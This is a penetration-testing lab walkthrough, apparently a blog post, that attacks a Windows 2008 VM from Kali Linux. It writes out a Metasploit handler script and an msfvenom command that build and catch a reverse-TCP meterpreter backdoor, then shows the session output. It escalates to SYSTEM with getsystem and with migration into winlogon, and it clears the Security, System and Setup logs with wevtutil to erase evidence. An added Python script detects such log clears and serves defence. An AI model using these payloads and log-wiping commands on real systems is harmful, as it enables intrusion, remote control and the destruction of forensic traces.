
- Systems used

Windows 2008

Kali Linux


- Checking the logs on Windows 2008

Start > Administrative Tools > Event Viewer > Windows Logs


- From Kali Linux, escalating privileges on the Windows 2008 host of a connected session and clearing its logs


(Kali)

# cd /root/bin

# vi reverse_resource2.rc

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.27.50
set ExitSession false
exploit -j -z

# msfconsole -r reverse_resource2.rc

 

 Taking notes in notepad? Have Metasploit Pro track & report

your progress and findings -- learn more on http://rapid7.com/metasploit


       =[ metasploit v4.14.10-dev                         ]

+ -- --=[ 1639 exploits - 944 auxiliary - 289 post        ]

+ -- --=[ 472 payloads - 40 encoders - 9 nops             ]

+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]


[*] Processing reverse_resource2.rc for ERB directives.

resource (reverse_resource2.rc)> use exploit/multi/handler

resource (reverse_resource2.rc)> set PAYLOAD windows/x64/meterpreter/reverse_tcp

PAYLOAD => windows/x64/meterpreter/reverse_tcp

resource (reverse_resource2.rc)> set LHOST 192.168.27.50

LHOST => 192.168.27.50

resource (reverse_resource2.rc)> set ExitSession false

ExitSession => false

resource (reverse_resource2.rc)> exploit -j -z

[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.27.50:4444 


[*] Starting the payload handler...

msf exploit(handler) > sessions


Active sessions

===============


No active sessions.


msf exploit(handler) > jobs


Jobs

====


  Id  Name                    Payload                              Payload opts

  --  ----                    -------                              ------------

  0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.27.50:4444


msf exploit(handler) > 


 


[Terminal 2]

# cd /root/bin

# msfvenom -p windows/x64/meterpreter/reverse_tcp \
    LHOST=192.168.27.50 LPORT=4444 -f exe -o backdoor.exe

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: backdoor.exe


 


# ls backdoor*

backdoor.exe


# cp backdoor.exe /share        /* see the previous post */


(win2008)

\\192.168.27.50\share

Copy the backdoor.exe file to the desktop > run it


(kali)

[*] Sending stage (1189423 bytes) to 192.168.27.201

[*] Meterpreter session 1 opened (192.168.27.50:4444 -> 192.168.27.201:49164) at 2017-11-10 21:29:00 +0900

msf exploit(handler) > sessions


Active sessions

===============


  Id  Type                     Information                      Connection

  --  ----                     -----------                      ----------

  1   meterpreter x64/windows  WIN2008\Administrator @ WIN2008  192.168.27.50:4444 -> 192.168.27.201:49164 (192.168.27.201)


msf exploit(handler) > sessions -i 1

[*] Starting interaction with 1...


meterpreter > 

meterpreter > getuid
Server username: WIN2008\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 636 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>wevtutil.exe el
wevtutil.exe el
Analytic
Application
....(omitted).....
Microsoft-Windows-osk/Diagnostic
Microsoft-Windows-stobject/Diagnostic
Security
Setup
System
TabletPC_InputPanel_Channel
ThinPrint Diagnostics
WINDOWS_MP4SDECD_CHANNEL
WMPSetup
WMPSyncEngine
Windows PowerShell
microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin

C:\Windows\system32>wevtutil.exe cl "System"
wevtutil.exe cl "System"

C:\Windows\system32>wevtutil.exe cl "Application"
wevtutil.exe cl "Application"

C:\Windows\system32>wevtutil.exe cl "Security"
wevtutil.exe cl "Security"

C:\Windows\system32>wevtutil.exe cl "Setup"
wevtutil.exe cl "Setup"

 

> Privilege escalation with getsystem

> Clearing the logs with wevtutil

[Reference] wevtutil    https://technet.microsoft.com/ko-kr/library/cc722318(v=ws.11).aspx
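From the defender's side the clears above are not silent: the Event Log service records a Security event 1102 ("The audit log was cleared") when the Security log is cleared, and a System event 104 naming any other channel that was cleared, and wevtutil cl goes through that same service, so those markers are the first thing to look for on a host like this one. The Python script below is an added example, not code from the original post. It runs over a constructed set of event records (the dict field names are a simplified assumption, modelled on the 1102/104 event data), flags each clear marker, notes when the clearing subject was the SYSTEM logon session (logon ID 0x3e7), which is how a getsystem-then-clear shows up rather than under the administrator's own account, and lists the channels that have nothing left but the marker.

```python
"""Detect Windows event-log clearing from exported event records.

Added example (not from the original post). Input is a constructed list of
dicts loosely modelled on exported Windows events; field names are simplified
assumptions. It looks for the two markers the Event Log service writes whenever
a channel is cleared, whether from Event Viewer or with wevtutil cl:
  * Security 1102 (provider Microsoft-Windows-Eventlog): audit log was cleared
  * System   104  (provider Microsoft-Windows-Eventlog): <channel> log was cleared
"""
from collections import defaultdict

EVENTLOG_PROVIDER = "Microsoft-Windows-Eventlog"
SYSTEM_LOGON_ID = "0x3e7"  # logon ID of the NT AUTHORITY\SYSTEM session

# Constructed records, as if exported shortly after the clears in the post.
# Application still has history; Security, Setup and System were cleared.
SAMPLE_EVENTS = [
    {"Channel": "Application", "EventID": 1000, "Provider": "Application Error",
     "TimeCreated": "2017-11-10T20:55:12", "Data": {}},
    {"Channel": "System", "EventID": 104, "Provider": EVENTLOG_PROVIDER,
     "TimeCreated": "2017-11-10T21:40:01",
     "Data": {"Channel": "System", "SubjectUserName": "SYSTEM",
              "SubjectDomainName": "NT AUTHORITY", "SubjectLogonId": "0x3e7"}},
    {"Channel": "Application", "EventID": 1001, "Provider": "Windows Error Reporting",
     "TimeCreated": "2017-11-10T21:05:30", "Data": {}},
    {"Channel": "Security", "EventID": 1102, "Provider": EVENTLOG_PROVIDER,
     "TimeCreated": "2017-11-10T21:40:07",
     "Data": {"SubjectUserName": "SYSTEM", "SubjectDomainName": "NT AUTHORITY",
              "SubjectLogonId": "0x3e7"}},
    {"Channel": "System", "EventID": 104, "Provider": EVENTLOG_PROVIDER,
     "TimeCreated": "2017-11-10T21:40:12",
     "Data": {"Channel": "Setup", "SubjectUserName": "SYSTEM",
              "SubjectDomainName": "NT AUTHORITY", "SubjectLogonId": "0x3e7"}},
    {"Channel": "System", "EventID": 7036, "Provider": "Service Control Manager",
     "TimeCreated": "2017-11-10T21:41:30", "Data": {}},
]


def is_clear_marker(ev):
    """True for the 1102/104 records written by the Event Log service itself."""
    if ev["Provider"] != EVENTLOG_PROVIDER:
        return False
    return (ev["Channel"], ev["EventID"]) in {("Security", 1102), ("System", 104)}


def cleared_channel(ev):
    """1102 always refers to Security; 104 names the cleared channel in its data."""
    return "Security" if ev["EventID"] == 1102 else ev["Data"]["Channel"]


def find_log_clears(events):
    """Return one finding per clear marker, oldest first."""
    findings = []
    for ev in events:
        if not is_clear_marker(ev):
            continue
        d = ev["Data"]
        findings.append({
            "channel": cleared_channel(ev),
            "event_id": ev["EventID"],
            "time": ev["TimeCreated"],
            "subject": f'{d.get("SubjectDomainName", "?")}\\{d.get("SubjectUserName", "?")}',
            # An admin clearing a log by hand appears under their own account;
            # the SYSTEM logon session doing it is what getsystem-then-clear looks like.
            "system_account": d.get("SubjectLogonId") == SYSTEM_LOGON_ID,
        })
    return sorted(findings, key=lambda f: f["time"])


def surviving_records(events, channels=("Application", "Security", "Setup", "System")):
    """Count records per channel, excluding the clear markers themselves."""
    counts = defaultdict(int)
    for ev in events:
        if not is_clear_marker(ev):
            counts[ev["Channel"]] += 1
    return {ch: counts.get(ch, 0) for ch in channels}


def emptied_channels(events):
    """Channels that were cleared and have nothing logged since except the marker."""
    cleared = {f["channel"] for f in find_log_clears(events)}
    return sorted(ch for ch, n in surviving_records(events).items()
                  if ch in cleared and n == 0)


if __name__ == "__main__":
    for f in find_log_clears(SAMPLE_EVENTS):
        flag = " [SYSTEM logon session]" if f["system_account"] else ""
        print(f'{f["time"]}  {f["channel"]:<12} cleared by {f["subject"]} '
              f'(event {f["event_id"]}){flag}')
    print("records remaining:", surviving_records(SAMPLE_EVENTS))
    print("still empty:", emptied_channels(SAMPLE_EVENTS))
```

On a real host the records would come from an export such as wevtutil qe or Get-WinEvent rather than the inline list, and the two markers are worth forwarding to a collector as they happen, since once the channel is cleared they are the only local trace of the earlier events.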


[Note] If getsystem does not escalate privileges

(when the Windows 7/8/8.1 operating system has been patched)

meterpreter > shell

Process 2928 created.

Channel 1 created.

Microsoft Windows [Version 6.1.7601]

Copyright (c) 2009 Microsoft Corporation. All rights reserved.


C:\Windows\system32>wmic process list brief | find "winlogon"

HandleCount  Name              Priority  ProcessId  ThreadCount  WorkingSetSize 

116          winlogon.exe         13        488        3            8327168 

C:\Windows\system32>exit

meterpreter > migrate 488

[*] Migrating from 4056 to 488...

[*] Migration completed successfully.

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM


(win 2008)

Checking the logs

Start > Control Panel > Administrative Tools > Event Viewer > Windows Logs

> Everything other than Application has been cleared: Security / Setup / System